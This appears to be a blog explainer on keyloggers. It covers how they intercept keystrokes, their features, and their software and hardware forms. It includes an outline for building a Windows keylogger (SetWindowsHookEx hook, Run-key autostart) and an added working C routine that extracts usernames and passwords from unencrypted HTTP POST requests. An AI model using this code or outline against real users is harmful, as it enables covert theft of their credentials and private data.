What Are KeyLoggers

Keylogger! You have probably heard the term. If not, just read on.
  
So, what is a keylogger?
Keylogger = keys + log: something that keeps a log of the keys pressed on the keyboard.


It is software or hardware that performs keystroke logging. Keystroke logging is the act of tracking and recording every key pressed on the keyboard without the user's knowledge, meaning the user is not aware that data such as credit card numbers and passwords is being captured by the attacker.

Keystroke loggers are stealthy programs (or devices) that sit somewhere on the path between the keyboard and the application, so that they see every keystroke. When you press a key, the keyboard controller sends a scan code to the computer; the operating system's keyboard driver turns it into a key event and delivers it to the window that has the focus, which then draws the character on the screen. A keylogger inserts itself into that chain, as a hook in the OS input path, as a driver that filters keyboard events, or as a device on the cable. It records the key as it passes and then lets it continue, so the user notices nothing. The program runs in the background and writes everything it sees to a log.

Simple keyloggers are often caught by anti-virus software; well-hidden ones use rootkit techniques to stay out of the process list, and since they produce no obvious network traffic until they deliver their logs, a firewall alone will not reveal them. Once keystrokes are logged, they are either hidden on the machine for later retrieval or shipped raw to the attacker. Depending on the software and its settings, the log is e-mailed to the attacker's address or copied to a specific path. The attacker then peruses it carefully, hoping to find passwords or other useful information that could be used to compromise the system or in a social engineering attack. For example, a keylogger reveals the contents of every e-mail the user composes.

Even if you manage to find one, removal can be hard: a logger that is part of a kernel rootkit may resist uninstallation, and then the only safe remedy is to reinstall the system from clean media. These are very, very powerful tools.


Uses:


  • As a surveillance tool, keyloggers are often used by employers to ensure that employees use work computers for business purposes only.
  • With a keylogger you can monitor your own computer: the log shows which keys were pressed in your absence, i.e. what someone else did on your machine.
  • On the other side, it is a hacking tool: an attacker can install one on the target's computer to obtain private data such as credit card numbers and passwords.
  • Keyloggers can also be used by a family (or a business) to monitor what people do on the network without their direct knowledge; whether that is lawful depends on local law and on the consent the monitored users have given.
Advanced keyloggers:
          Early keyloggers could only record the keys the victim pressed. Modern ones can also record video of what the victim is doing on the computer, and even stream the screen live while the victim is connected to the Internet. They take screenshots, which is mainly useful for web activity, for example to see which sites the victim visits. They send the logged keys and the screenshots from the victim's system to your e-mail address, provided the victim is online.


Keylogger must have:
          A classic Windows keylogger built on a global keyboard hook (WH_KEYBOARD) needs two files: a .dll that contains the hook procedure and does the actual capturing, and an .exe that loads the .dll, installs the hook with SetWindowsHookEx and takes care of the rest, such as storing the records or sending them to the user. Windows loads the hook .dll into every process that receives keyboard input, which is why the hook procedure cannot simply live inside the .exe. Both files must sit where the .exe expects them, usually in the same directory. A keylogger can therefore be as simple as an .exe and a .dll dropped on a machine and started at boot through an autostart registry entry (for example a Run key). Note that a low-level keyboard hook (WH_KEYBOARD_LL) runs inside the installing process, so a logger built on it needs only the .exe.
A full-featured keylogger boasts features such as these (the list below is typical of a commercial product):

  • Stealth: invisible in the process list/Task Manager.
  • Includes a kernel keylogger driver that captures keystrokes even when no user is logged on (to capture logon passwords).
  • ProBot program files (used to start the keylogger at boot time) and registry entries are hidden.
  • Includes a Remote Deployment wizard (installing and uninstalling remotely).
  • Active window title and process name logging.
  • Keystroke / password logging.
  • Regional keyboard support.
  • Launched applications list.
  • Text snapshots of active applications.
  • Visited Internet URL logger.
  • Capture HTTP POST data (including logins/passwords).
  • File and folder creation/removal logging.
  • Log file archiving, with separate log files for each user (on one system many users may work, especially in an organisation).
  • Log file encryption (so only the intended person can read the logs and they are not open to everyone).
  • Password authentication.
  • Invisible operation
  • Native GUI session log presentation
  • HTML and Text log file export
  • Automatic E-mail log file delivery
  • Easy setup & uninstall wizards
  • Support for all Windows versions.

Types:
  • Software based: programs/applications installed on the victim's system to log the keys pressed.
  • Hardware based: a small device placed between the keyboard and the computer. It normally has a USB (or PS/2) connector and plugs in at the end of the keyboard cable where it meets the computer. On a laptop it can only intercept an external USB keyboard; the built-in keyboard has no exposed cable to tap.

Software-based key-loggers:


A logfile from a software-based keylogger.
These are software programs designed to work on the target computer's operating system. From a technical perspective they fall into the following categories:
  • Hypervisor-based: the keylogger can theoretically reside in a malicious hypervisor running underneath the operating system, which itself remains untouched; the OS effectively becomes a virtual machine running on top of the malware. Blue Pill is a conceptual example.
  • Kernel-based: this method is difficult both to write and to combat. Such keyloggers reside at the kernel level, which makes them the hardest to detect. They are typically implemented as rootkits that subvert the operating system kernel and gain unauthorised access to the hardware, making them very powerful. A keylogger using this method can, for example, act as a keyboard device driver and thus see everything typed on the keyboard as it passes to the operating system.
  • API-based: these keyloggers hook keyboard APIs; the operating system then notifies the keylogger each time a key is pressed and the keylogger simply records it. Windows APIs such as SetWindowsHookEx() (with WH_KEYBOARD or WH_KEYBOARD_LL) subscribe to keyboard events, while GetAsyncKeyState() and GetForegroundWindow() poll the state of the keyboard and identify the active window. These keyloggers are the easiest to write, but where constant polling of each key is required they can cause a noticeable increase in CPU usage and can also miss the occasional key.
  • Form grabbing based: form-grabbing keyloggers log web form submissions by hooking the browser's form-submission (onsubmit) handling. This records the form data before the browser encrypts it for transmission, so HTTPS does not protect it.
  • Memory injection based: memory-injection keyloggers alter memory tables associated with the browser and other system functions to perform their logging. By patching those tables or injecting directly into the browser process, which already runs as the user, the malware needs no elevation and therefore never trips Windows UAC (User Account Control). The Zeus and SpyEye Trojans are well-known users of this method.
  • Packet analyzers: these capture network traffic associated with HTTP POST events to retrieve passwords sent in the clear; they only work on traffic that is not TLS-encrypted.
  • Remote access software keyloggers: local software keyloggers with an added feature that allows the locally recorded data to be accessed from a remote location. Remote communication may be achieved by one of these methods:
      • Data is uploaded to a website, database or an FTP server.
      • Data is periodically e-mailed to a pre-defined address.
      • Data is wirelessly transmitted by means of an attached hardware system.
      • The software enables a remote login to the local machine from the Internet or the local network, so that the logs stored on the target machine can be accessed.

Related features
Software keyloggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include:
  • Clipboard logging. Anything that has been copied to the clipboard can be captured by the program.
  • Screen logging. Screenshots are taken in order to capture graphics-based information. Applications with screen logging abilities may take screenshots of the whole screen, either periodically or in response to user behaviour (for example, when the user clicks the mouse).
  • Control text retrieval. The Microsoft Windows API allows a program to request the text 'value' of some controls. This means that some passwords may be captured even though they are hidden behind password masks on screen.
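The packet-analyzer category above (and the "Capture HTTP POST data" feature in the list earlier), as an added example that is not code from the original post: given one reassembled HTTP request, it decides whether it is a form-encoded POST and pulls out the login fields, percent-decoding them. The request in SAMPLE_POST and the field names tried are constructed assumptions, and the capture itself (libpcap and TCP reassembly) is left out; the point is what an unencrypted login hands to anyone on the path.

```c
/* Added example (not from the original post): a credential grabber of the
 * "packet analyzer" kind, run over one reassembled HTTP request.  The packet
 * capture step (libpcap) is omitted; SAMPLE_POST is a constructed payload. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

struct creds { int found; char user[64]; char pass[64]; };

/* Constructed capture of a login sent over plain HTTP (no TLS). */
static const char SAMPLE_POST[] =
    "POST /login HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 37\r\n"
    "\r\n"
    "user=alice%40example.com&pass=p%26w+1";

static int hexval(int c)
{
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Percent-decode n bytes of a form value into out: '+' becomes a space and a
 * malformed or truncated %XX is copied through literally instead of crashing. */
static void form_decode(const char *s, size_t n, char *out, size_t outsz)
{
    size_t o = 0;
    for (size_t i = 0; i < n && o + 1 < outsz; i++) {
        int hi, lo;
        if (s[i] == '+') {
            out[o++] = ' ';
        } else if (s[i] == '%' && i + 2 < n &&
                   (hi = hexval((unsigned char)s[i + 1])) >= 0 &&
                   (lo = hexval((unsigned char)s[i + 2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = s[i];
        }
    }
    out[o] = '\0';
}

/* Look up key=value in an x-www-form-urlencoded body; 1 if found (value decoded). */
static int form_get(const char *body, const char *key, char *out, size_t outsz)
{
    size_t klen = strlen(key);
    for (const char *p = body; *p; ) {
        const char *end = strchr(p, '&');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len > klen && strncmp(p, key, klen) == 0 && p[klen] == '=') {
            form_decode(p + klen + 1, len - klen - 1, out, outsz);
            return 1;
        }
        if (!end) break;
        p = end + 1;
    }
    return 0;
}

/* Extract a username/password pair from a raw HTTP request if it is a
 * form-encoded POST.  The field names are assumptions (common defaults); a
 * real grabber also learns them from the site's login page. */
struct creds grab_credentials(const char *req)
{
    static const char *ukeys[] = { "user", "username", "login", "email" };
    static const char *pkeys[] = { "pass", "password", "passwd" };
    struct creds c = { 0, "", "" };
    const char *body = strstr(req, "\r\n\r\n");
    if (strncmp(req, "POST ", 5) != 0 || !body ||
        !strstr(req, "application/x-www-form-urlencoded"))
        return c;                                    /* not a form POST */
    body += 4;
    int u = 0, p = 0;
    for (size_t i = 0; i < sizeof ukeys / sizeof *ukeys && !u; i++)
        u = form_get(body, ukeys[i], c.user, sizeof c.user);
    for (size_t i = 0; i < sizeof pkeys / sizeof *pkeys && !p; i++)
        p = form_get(body, pkeys[i], c.pass, sizeof c.pass);
    c.found = u && p;
    return c;
}

int main(void)
{
    struct creds c = grab_credentials(SAMPLE_POST);
    if (c.found) printf("user=%s pass=%s\n", c.user, c.pass);
    return 0;
}
```

The check a defender wants is the converse of the attack: run the same extractor over traffic leaving your own network, and any hit means a login form is being submitted without TLS. Over HTTPS the payload is ciphertext and the extractor sees no request line at all, which is exactly the limitation noted for packet analyzers above.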


Hardware-based keyloggers

A hardware-based keylogger.

A connected hardware-based keylogger.
Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system.
  • Firmware-based: BIOS-level firmware that handles keyboard events can be modified to record those events as they are processed. Physical and/or root-level access to the machine is required, and the code loaded into the BIOS has to be built for the specific hardware it will run on.
  • Keyboard hardware: hardware keyloggers log keystrokes by means of a hardware circuit attached somewhere between the keyboard and the computer, typically inline with the keyboard's cable connector. More stealthy implementations can be installed or built into standard keyboards, so that no device is visible on the external cable. Both types log all keyboard activity to their internal memory, which can subsequently be accessed, for example by typing a secret key sequence. A hardware keylogger has an advantage over a software solution: it does not depend on being installed in the target computer's operating system, so it neither interferes with any program running on the target machine nor is, in general, visible to software running on it.
  • Wireless keyboard sniffers: These passive sniffers collect packets of data being transferred from a wireless keyboard and its receiver. As encryption may be used to secure the wireless communications between the two devices, this may need to be cracked beforehand if the transmissions are to be read.
  • Keyboard overlays: Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed over it. The device is designed to look like an integrated part of the machine so that bank customers are unaware of its presence.
  • Acoustic keyloggers: acoustic cryptanalysis can be used to monitor the sound created by someone typing on a computer. Each key on the keyboard makes a subtly different acoustic signature when struck. It is then possible to identify which keystroke signature relates to which keyboard character via statistical methods such as frequency analysis.
  • Electromagnetic emissions: it is possible to capture the electromagnetic emissions of a wired keyboard from up to 20 metres (66 ft) away, without being physically wired to it. In 2009, Swiss researchers tested 11 different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture. The researchers used a wide-band receiver to tune into the specific frequency of the emissions radiated from the keyboards.
  • Optical surveillance: optical surveillance, while not a keylogger in the classical sense, is nonetheless an approach that can be used to capture passwords or PINs. A strategically placed camera, such as a hidden surveillance camera at an ATM, can allow a criminal to watch a PIN or password being entered.
  • Physical evidence: for a keypad that is used only to enter a security code, the keys in actual use show evidence of use from many fingerprints. Knowing which four keys are worn reduces a four-digit PIN with distinct digits to just 24 possible orderings.






  If you have any query, then mail me or comment here!
  Keep enjoying!
